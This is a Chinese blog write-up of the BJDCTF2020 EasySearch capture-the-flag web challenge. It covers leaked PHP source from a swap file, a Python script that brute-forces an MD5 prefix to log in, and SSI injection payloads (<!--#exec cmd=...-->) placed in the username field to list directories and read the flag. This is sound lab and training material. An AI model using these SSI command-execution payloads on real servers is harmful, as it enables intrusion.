[BJDCTF2020]EasySearch

最新推荐文章于 2024-01-07 15:09:54 发布
最新推荐文章于 2024-01-07 15:09:54 发布
阅读量219 收藏
点赞数
分类专栏: buuctf 文章标签: web安全 php 安全 SSI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/126049432
版权

[BJDCTF2020]EasySearch
在这里插入图片描述
一个登陆页面,尝试了弱口令 爆破 注入无果
扫描目录发现index.php.swp

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

代码审计:

if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";

只要密码的md5值的前6位为6d0bc1即可登陆成功
参考爆破密码脚本:

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()#获取摘要值
    if a[0:6] == '6d0bc1':
        print("find password!"+str(i))
        break

在这里插入图片描述
得到密码为 2020666

接着看到shtml页面
在这里插入图片描述
SSI注入参考:SSI注入
代码中生成了一个shtml页面,登陆后无法查看,抓包观察返回包:
在这里插入图片描述
访问该页面:
在这里插入图片描述
得到登陆信息

这里用到shtml,HTML是静态的,而shtml基于SSI技术,当有服务器端可执行脚本时被当作一种动态编程语言,所以可以注入,也可以用来远程命令执行。

它的注入格式是这样的:<!--#exec cmd="命令"-->
所以只需要将username设置为payload即可
首先探测根目录:<!--#exec cmd="ls /"-->
在这里插入图片描述
在这里插入图片描述
根目录没有,那查看当前目录:<!--#exec cmd="ls"-->
也没有
查看上级目录:<!--#exec cmd="ls ../"-->
在这里插入图片描述
找到flag文件
查看flag:username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&&password=2020666
在这里插入图片描述

pakho_C
关注
专栏目录
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2992
buuctf 源码泄露 ssi远程命令执行漏洞
[BJDCTF2020]EasySearchSSI注入漏洞)
最新发布
weixin_73399382的博客
07-30 1036
使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。这题ctrl+U发现往index.php提交数据,但是我目录,git泄露,sqlmap,爆破admin密码都没有作用,数据包页面也没有什么重置密码注册的功能。接下来,使用uniqid()函数生成一个唯一的字符串,并将其与$random拼接在一起,形成最终的字符串$content。
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 332
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUUCTF [BJDCTF2020]Easy MD51 解析WP
m0_73615178的博客
01-07 1258
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,传参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
【ctfshow BJDctf2020 encode】
chuxuezhewocao的博客
05-31 624
一、代码分析 程序是由各UPX的壳的,用工具脱壳后,IDA打开 可以看到,基本的逻辑是首先判断输入长度是否为21,然后进行了一个变表的base64加密,然后加密后的结果与v5进行循环异或,再将得到的结果经过一个不知道是什么的加密后,将得到的结果与v6比较。 刚开始做的时候并没有一下子看出来最后经过了一个RC4加密,而是看到了a1指针指向的内容最后经过了一个异或运算,并且异或的值应该与输入无关,所以我直接通过在异或的位置下断点,从寄存器内读出了v9的内容。 实际上如果看懂了这是个RC4加密的代码后,可以通过写
EasySearch
03-16
Make the search easyly HOW TO INSTALL ============== Please copy the easysearch.jar to your JBuilder lib/ext folder, and re-start JBuilder. HOW TO UNINSTALL ================ Exit from JBuilder, and remove easysearch.jar from your JBuilder lib/ext folder. HOW TO USE ========== 1. Select some text in JBuilder Editor pane or copy some text into clipboard. 2. Click the Search button in toolbar, it will search the next text from the cursor position. 3. Click the Highlight button in toolbar, it will highlight all the matched text in editor pane. 4. Ctrl-Up Search the previous text. 5 Ctrl-Down Search the next text.
[BJDCTF2020]EasySearch——ssi
m0_62879498的博客
05-14 461
[BJDCTF2020]EasySearch 1 和上一关相似 是 源码泄露 使用御剑对目录进行扫描 发现了 index.php.swp 0X01 源码分析 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值